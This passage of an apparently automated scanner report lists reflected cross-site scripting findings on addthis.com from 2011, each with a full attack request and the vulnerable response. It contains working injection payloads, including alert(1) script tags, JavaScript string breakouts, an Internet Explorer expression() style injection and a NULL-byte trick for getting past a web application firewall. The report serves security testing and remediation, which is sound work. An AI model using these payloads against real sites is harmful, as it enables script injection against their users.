Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog7642a"-alert(1)-"ac307bfde67/wp-content/themes/addthis3/images/bkg-btn-grey.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker
...[SNIP]...

2.23. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00644ef"-alert(1)-"5e09bbf5eb7 was submitted in the REST URL parameter 2. This input was echoed as 644ef"-alert(1)-"5e09bbf5eb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog/wp-content%00644ef"-alert(1)-"5e09bbf5eb7/themes/addthis3/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog/wp-content%00644ef"-alert(1)-"5e09bbf5eb7/themes/addthis3/images/bkg-btn-grey.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPage
...[SNIP]...

2.24. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5eb7f<script>alert(1)</script>85e63e5a1ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes5eb7f<script>alert(1)</script>85e63e5a1ef/addthis3/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog/wp-content/themes5eb7f<script>alert(1)</script>85e63e5a1ef/addthis3/images/bkg-btn-grey.gif</strong>
...[SNIP]...

2.25. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a735e"-alert(1)-"0deed3db717 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blog/wp-content/themesa735e"-alert(1)-"0deed3db717/addthis3/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog/wp-content/themesa735e"-alert(1)-"0deed3db717/addthis3/images/bkg-btn-grey.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u)
...[SNIP]...

2.26. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4c1d4<script>alert(1)</script>9da16891fbd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/addthis34c1d4<script>alert(1)</script>9da16891fbd/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog/wp-content/themes/addthis34c1d4<script>alert(1)</script>9da16891fbd/images/bkg-btn-grey.gif</strong>
...[SNIP]...

2.27. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1beb0"-alert(1)-"dd0895a6e41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blog/wp-content/themes/addthis31beb0"-alert(1)-"dd0895a6e41/images/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog/wp-content/themes/addthis31beb0"-alert(1)-"dd0895a6e41/images/bkg-btn-grey.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</scr
...[SNIP]...

2.28. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 434cd<script>alert(1)</script>5784fbcf077 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/addthis3/images434cd<script>alert(1)</script>5784fbcf077/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog/wp-content/themes/addthis3/images434cd<script>alert(1)</script>5784fbcf077/bkg-btn-grey.gif</strong>
...[SNIP]...

2.29. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafde"-alert(1)-"ee791d407be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blog/wp-content/themes/addthis3/imagesaafde"-alert(1)-"ee791d407be/bkg-btn-grey.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog/wp-content/themes/addthis3/imagesaafde"-alert(1)-"ee791d407be/bkg-btn-grey.gif";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.30. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4068d"-alert(1)-"dd33cdcc2d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif4068d"-alert(1)-"dd33cdcc2d6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif4068d"-alert(1)-"dd33cdcc2d6";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.31. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 30377<script>alert(1)</script>eebd218bdaa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif30377<script>alert(1)</script>eebd218bdaa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif30377<script>alert(1)</script>eebd218bdaa</strong>
...[SNIP]...

2.32. http://www.addthis.com/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 302eb<script>alert(1)</script>988736a1019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif?302eb<script>alert(1)</script>988736a1019=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 03:54:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>blog/wp-content/themes/addthis3/images/bkg-btn-grey.gif?302eb<script>alert(1)</script>988736a1019=1</strong>
...[SNIP]...

2.33. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 721ec"-alert(1)-"fb93c4f06dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php721ec"-alert(1)-"fb93c4f06dd?v=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; ana_svc=cb; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:59:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9qdhfee74ugnf17p04kb5mbcb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php721ec"-alert(1)-"fb93c4f06dd";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.34. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c637<script>alert(1)</script>def9f8f3755 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php1c637<script>alert(1)</script>def9f8f3755?v=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; ana_svc=cb; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:59:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=f18l67gfuisgng2e994dbdpfb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php1c637<script>alert(1)</script>def9f8f3755?v=%22%20stYle=%22x:expre/**/ssion(netsparker(9))</strong>
...[SNIP]...

2.35. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2fb8"style%3d"x%3aexpression(alert(1))"4dc51108213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f2fb8"style="x:expression(alert(1))"4dc51108213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=%22%20stYle=%22x:expre/**/ssion(netsparker/f2fb8"style%3d"x%3aexpression(alert(1))"4dc51108213(9)) HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; ana_svc=cb; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:59:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93940

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-" stYle="x:expre/**/ssion(netsparker/f2fb8"style="x:expression(alert(1))"4dc51108213(9))" />
...[SNIP]...

2.36. http://www.addthis.com/bookmark.php [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfc7"style%3d"x%3aexpression(alert(1))"d4766727175 was submitted in the v parameter. This input was echoed as 4bfc7"style="x:expression(alert(1))"d4766727175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=%22%20stYle=%22x:expre/**/ssion(netsparker(9))4bfc7"style%3d"x%3aexpression(alert(1))"d4766727175 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; ana_svc=cb; __utmz=56306477.1303530430.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=56306477.656125860.1303530430.1303530430.1303530430.1; __utmb=56306477.2.10.1303530430; uid=4dab4fa85facd099; psc=4; _chartbeat2=v6gcvdw86l4w274q

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:58:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93939

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-" stYle="x:expre/**/ssion(netsparker(9))4bfc7"style="x:expression(alert(1))"d4766727175" />
...[SNIP]...

2.37. http://www.addthis.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97f53"-alert(1)-"f20737a456b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico97f53"-alert(1)-"f20737a456b HTTP/1.1
Host: www.addthis.com
